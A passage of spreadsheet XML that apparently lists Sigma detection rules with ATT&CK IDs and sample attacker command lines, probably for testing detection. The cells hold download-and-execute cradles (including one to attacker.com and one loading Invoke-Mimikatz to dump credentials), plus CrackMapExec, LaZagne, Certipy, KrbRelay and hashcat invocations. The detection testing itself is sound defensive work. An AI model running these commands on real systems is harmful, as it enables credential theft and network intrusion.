        </is>
      </c>
      <c r="E627" s="43" t="inlineStr">
        <is>
          <t>rpcping.exe -s 10.0.0.5</t>
        </is>
      </c>
      <c r="F627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I627" s="43" t="n"/>
      <c r="J627" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K627" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="628" ht="15.75" customHeight="1" s="42">
      <c r="A628" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B628" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rpcping_credential_capture</t>
        </is>
      </c>
      <c r="C628" s="43" t="inlineStr">
        <is>
          <t>Capture Credentials with Rpcping.exe</t>
        </is>
      </c>
      <c r="D628" s="43" t="inlineStr">
        <is>
          <t>93671f99-04eb-4ab4-a161-70d446a84003</t>
        </is>
      </c>
      <c r="E628" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\RpcPing.exe" -s 127.0.0.1 -e 1234 -a privacy -u NTLM</t>
        </is>
      </c>
      <c r="F628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I628" s="43" t="n"/>
      <c r="J628" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K628" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="629" ht="15.75" customHeight="1" s="42">
      <c r="A629" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B629" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rpcping_credential_capture</t>
        </is>
      </c>
      <c r="C629" s="43" t="inlineStr">
        <is>
          <t>Capture Credentials with Rpcping.exe</t>
        </is>
      </c>
      <c r="D629" s="43" t="inlineStr">
        <is>
          <t>93671f99-04eb-4ab4-a161-70d446a84003</t>
        </is>
      </c>
      <c r="E629" s="43" t="inlineStr">
        <is>
          <t>RpcPing.exe -s 10.0.0.5</t>
        </is>
      </c>
      <c r="F629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I629" s="43" t="n"/>
      <c r="J629" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K629" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="630" ht="15.75" customHeight="1" s="42">
      <c r="A630" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B630" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C630" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D630" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E630" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr "Everyone" | more</t>
        </is>
      </c>
      <c r="F630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I630" s="43" t="n"/>
      <c r="J630" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K630" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="631" ht="15.75" customHeight="1" s="42">
      <c r="A631" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B631" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C631" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D631" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E631" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr "Everyone" &gt; NUL</t>
        </is>
      </c>
      <c r="F631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I631" s="43" t="n"/>
      <c r="J631" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K631" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="632" ht="15.75" customHeight="1" s="42">
      <c r="A632" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B632" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C632" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D632" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E632" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr "Everyone" | findstr "(M)" | findstr "BUILTIN\Users"</t>
        </is>
      </c>
      <c r="F632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I632" s="43" t="n"/>
      <c r="J632" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K632" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="633" ht="15.75" customHeight="1" s="42">
      <c r="A633" s="43" t="inlineStr">
        <is>
          <t>t1552.006</t>
        </is>
      </c>
      <c r="B633" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_everyone</t>
        </is>
      </c>
      <c r="C633" s="43" t="inlineStr">
        <is>
          <t>Permission Misconfiguration Reconnaissance Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D633" s="43" t="inlineStr">
        <is>
          <t>47e4bab7-c626-47dc-967b-255608c9a920</t>
        </is>
      </c>
      <c r="E633" s="43" t="inlineStr">
        <is>
          <t>icacls "C:\\Program Files\*" 2&gt;nul | findstr "Everyone" | findstr "(M)" | findstr "BUILTIN\Users" | more</t>
        </is>
      </c>
      <c r="F633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I633" s="43" t="n"/>
      <c r="J633" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K633" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="634" ht="15.75" customHeight="1" s="42">
      <c r="A634" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B634" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C634" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D634" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E634" s="43" t="inlineStr">
        <is>
          <t>update.exe smb 10.0.0.0/24 --username admin --password pass --local-auth --exec-method smbexec -x whoami</t>
        </is>
      </c>
      <c r="F634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I634" s="43" t="n"/>
      <c r="J634" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K634" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="635" ht="15.75" customHeight="1" s="42">
      <c r="A635" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B635" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C635" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D635" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E635" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "copy-item 'powershell.exe' -Destination 'cme.exe'" &amp;&amp; cme.exe -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I635" s="43" t="n"/>
      <c r="J635" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K635" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="636" ht="15.75" customHeight="1" s="42">
      <c r="A636" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B636" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C636" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D636" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E636" s="43" t="inlineStr">
        <is>
          <t>crackmapexec.exe smb 192.168.1.10/24 --user='admin' --pass='password' --local-auth</t>
        </is>
      </c>
      <c r="F636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I636" s="43" t="n"/>
      <c r="J636" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K636" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="637" ht="15.75" customHeight="1" s="42">
      <c r="A637" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B637" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C637" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D637" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E637" s="43" t="inlineStr">
        <is>
          <t>crackmapexec.exe smb 172.16.5.0/24 --local-auth -u admin -p pass</t>
        </is>
      </c>
      <c r="F637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I637" s="43" t="n"/>
      <c r="J637" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K637" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="638" ht="15.75" customHeight="1" s="42">
      <c r="A638" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B638" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C638" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D638" s="43" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E638" s="43" t="inlineStr">
        <is>
          <t>Certify.exe find /vulnerable /domain:internal.corp</t>
        </is>
      </c>
      <c r="F638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I638" s="43" t="n"/>
      <c r="J638" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K638" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="639" ht="15.75" customHeight="1" s="42">
      <c r="A639" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B639" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C639" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D639" s="43" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E639" s="43" t="inlineStr">
        <is>
          <t>Certify.exe .\find /vulnerable /domain:internal.corp</t>
        </is>
      </c>
      <c r="F639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I639" s="43" t="n"/>
      <c r="J639" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K639" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="640" ht="15.75" customHeight="1" s="42">
      <c r="A640" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B640" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C640" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D640" s="43" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E640" s="43" t="inlineStr">
        <is>
          <t>Certify.exe find /vulnerable /domain:internal.corp /path:C:\Temp\</t>
        </is>
      </c>
      <c r="F640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I640" s="43" t="n"/>
      <c r="J640" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K640" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="641" ht="15.75" customHeight="1" s="42">
      <c r="A641" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B641" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C641" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D641" s="43" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E641" s="43" t="inlineStr">
        <is>
          <t>Certify.exe find /vulnerable /domain:internal.corp /altname:altname1</t>
        </is>
      </c>
      <c r="F641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I641" s="43" t="n"/>
      <c r="J641" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K641" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="642" ht="15.75" customHeight="1" s="42">
      <c r="A642" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B642" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C642" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D642" s="43" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E642" s="43" t="inlineStr">
        <is>
          <t>certipy.exe  find -u administrator -p Password123 -dc-ip 10.10.10.10</t>
        </is>
      </c>
      <c r="F642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I642" s="43" t="n"/>
      <c r="J642" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K642" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="643" ht="15.75" customHeight="1" s="42">
      <c r="A643" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B643" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C643" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D643" s="43" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E643" s="43" t="inlineStr">
        <is>
          <t>certipy.exe find -u admin -p Password123 -dc-ip 10.10.10.10</t>
        </is>
      </c>
      <c r="F643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I643" s="43" t="n"/>
      <c r="J643" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K643" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="644" ht="15.75" customHeight="1" s="42">
      <c r="A644" s="43" t="inlineStr">
        <is>
          <t>t1110.002</t>
        </is>
      </c>
      <c r="B644" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hashcat</t>
        </is>
      </c>
      <c r="C644" s="43" t="inlineStr">
        <is>
          <t>HackTool - Hashcat Password Cracker Execution</t>
        </is>
      </c>
      <c r="D644" s="43" t="inlineStr">
        <is>
          <t>39b31e81-5f5f-4898-9c0e-2160cfc0f9bf</t>
        </is>
      </c>
      <c r="E644" s="43" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule C:\AtomicRedTeam\atomics\T1110.002\src\sam.txt C:\AtomicRedTeam\atomics\T1110.002\src\password.lst</t>
        </is>
      </c>
      <c r="F644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I644" s="43" t="n"/>
      <c r="J644" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K644" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="645" ht="15.75" customHeight="1" s="42">
      <c r="A645" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B645" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay</t>
        </is>
      </c>
      <c r="C645" s="43" t="inlineStr">
        <is>
          <t>HackTool - KrbRelay Execution</t>
        </is>
      </c>
      <c r="D645" s="43" t="inlineStr">
        <is>
          <t>e96253b8-6b3b-4f90-9e59-3b24b99cf9b4</t>
        </is>
      </c>
      <c r="E645" s="43" t="inlineStr">
        <is>
          <t>KrbRelay.exe -spn "cifs/target.domain.local" -clsid "{12345678-1234-1234-1234-123456789012}" -rbcd target$</t>
        </is>
      </c>
      <c r="F645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I645" s="43" t="n"/>
      <c r="J645" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K645" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="646" ht="15.75" customHeight="1" s="42">
      <c r="A646" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B646" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C646" s="43" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D646" s="43" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E646" s="43" t="inlineStr">
        <is>
          <t>copy KrbRelayUp.exe benign_tool.exe &amp;&amp; .\benign_tool.exe relay -Domain contoso.local -ComputerName target-host$</t>
        </is>
      </c>
      <c r="F646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I646" s="43" t="n"/>
      <c r="J646" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K646" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="647" ht="15.75" customHeight="1" s="42">
      <c r="A647" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B647" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C647" s="43" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D647" s="43" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E647" s="43" t="inlineStr">
        <is>
          <t>setspn -T %USERDNSDOMAIN% -Q */*</t>
        </is>
      </c>
      <c r="F647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I647" s="43" t="n"/>
      <c r="J647" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K647" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="648" ht="15.75" customHeight="1" s="42">
      <c r="A648" s="43" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B648" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C648" s="43" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D648" s="43" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E648" s="43" t="inlineStr">
        <is>
          <t>setspn.exe -T %USERDNSDOMAIN% -Q */*</t>
        </is>
      </c>
      <c r="F648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I648" s="43" t="n"/>
      <c r="J648" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K648" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="649" ht="15.75" customHeight="1" s="42">
      <c r="A649" s="43" t="inlineStr">
        <is>
          <t>credential-access</t>
        </is>
      </c>
      <c r="B649" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_lazagne</t>
        </is>
      </c>
      <c r="C649" s="43" t="inlineStr">
        <is>
          <t>HackTool - LaZagne Execution</t>
        </is>
      </c>
      <c r="D649" s="43" t="inlineStr">
        <is>
          <t>c2b86e67-b880-4eec-b045-50bc98ef4844</t>
        </is>
      </c>
      <c r="E649" s="43" t="inlineStr">
        <is>
          <t>C:\Temp\lazagne.exe all</t>
        </is>
      </c>
      <c r="F649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I649" s="43" t="n"/>
      <c r="J649" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K649" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="650" ht="15.75" customHeight="1" s="42">
      <c r="A650" s="43" t="inlineStr">
        <is>
          <t>credential-access</t>
        </is>
      </c>
      <c r="B650" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_lazagne</t>
        </is>
      </c>
      <c r="C650" s="43" t="inlineStr">
        <is>
          <t>HackTool - LaZagne Execution</t>
        </is>
      </c>
      <c r="D650" s="43" t="inlineStr">
        <is>
          <t>c2b86e67-b880-4eec-b045-50bc98ef4844</t>
        </is>
      </c>
      <c r="E650" s="43" t="inlineStr">
        <is>
          <t>C:\Users\Public\lazagne.exe -all</t>
        </is>
      </c>
      <c r="F650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I650" s="43" t="n"/>
      <c r="J650" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K650" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="651" ht="15.75" customHeight="1" s="42">
      <c r="A651" s="43" t="inlineStr">
        <is>
          <t>credential-access</t>
        </is>
      </c>
      <c r="B651" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_lazagne</t>
        </is>
      </c>
      <c r="C651" s="43" t="inlineStr">
        <is>
          <t>HackTool - LaZagne Execution</t>
        </is>
      </c>
      <c r="D651" s="43" t="inlineStr">
        <is>
          <t>c2b86e67-b880-4eec-b045-50bc98ef4844</t>
        </is>
      </c>
      <c r="E651" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\Temp\lazagne.exe browsers mails</t>
        </is>
      </c>
      <c r="F651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I651" s="43" t="n"/>
      <c r="J651" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K651" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="652" ht="15.75" customHeight="1" s="42">
      <c r="A652" s="43" t="inlineStr">
        <is>
          <t>credential-access</t>
        </is>
      </c>
      <c r="B652" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_lazagne</t>
        </is>
      </c>
      <c r="C652" s="43" t="inlineStr">
        <is>
          <t>HackTool - LaZagne Execution</t>
        </is>
      </c>
      <c r="D652" s="43" t="inlineStr">
        <is>
          <t>c2b86e67-b880-4eec-b045-50bc98ef4844</t>
        </is>
      </c>
      <c r="E652" s="43" t="inlineStr">
        <is>
          <t>C:\Users\User\AppData\Local\Temp\lazagne.exe -browsers -mails</t>
        </is>
      </c>
      <c r="F652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I652" s="43" t="n"/>
      <c r="J652" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K652" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="653" ht="15.75" customHeight="1" s="42">
      <c r="A653" s="43" t="inlineStr">
        <is>
          <t>credential-access</t>
        </is>
      </c>
      <c r="B653" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_lazagne</t>
        </is>
      </c>
      <c r="C653" s="43" t="inlineStr">
        <is>
          <t>HackTool - LaZagne Execution</t>
        </is>
      </c>
      <c r="D653" s="43" t="inlineStr">
        <is>
          <t>c2b86e67-b880-4eec-b045-50bc98ef4844</t>
        </is>
      </c>
      <c r="E653" s="43" t="inlineStr">
        <is>
          <t>C:\Users\User\Downloads\lazagne.exe -credman -lsa_secrets</t>
        </is>
      </c>
      <c r="F653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I653" s="43" t="n"/>
      <c r="J653" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K653" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="654" ht="15.75" customHeight="1" s="42">
      <c r="A654" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B654" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_mimikatz_command_line</t>
        </is>
      </c>
      <c r="C654" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution</t>
        </is>
      </c>
      <c r="D654" s="43" t="inlineStr">
        <is>
          <t>a642964e-bead-4bed-8910-1bb4d63e3b4d</t>
        </is>
      </c>
      <c r="E654" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"</t>
        </is>
      </c>
      <c r="F654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I654" s="43" t="n"/>
      <c r="J654" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K654" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="655" ht="15.75" customHeight="1" s="42">
      <c r="A655" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B655" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rdrleakdiag_process_dumping</t>
        </is>
      </c>
      <c r="C655" s="43" t="inlineStr">
        <is>
          <t>Process Memory Dump via RdrLeakDiag.EXE</t>
        </is>
      </c>
      <c r="D655" s="43" t="inlineStr">
        <is>
          <t>edadb1e5-5919-4e4c-8462-a9e643b02c4b</t>
        </is>
      </c>
      <c r="E655" s="43" t="inlineStr">
        <is>
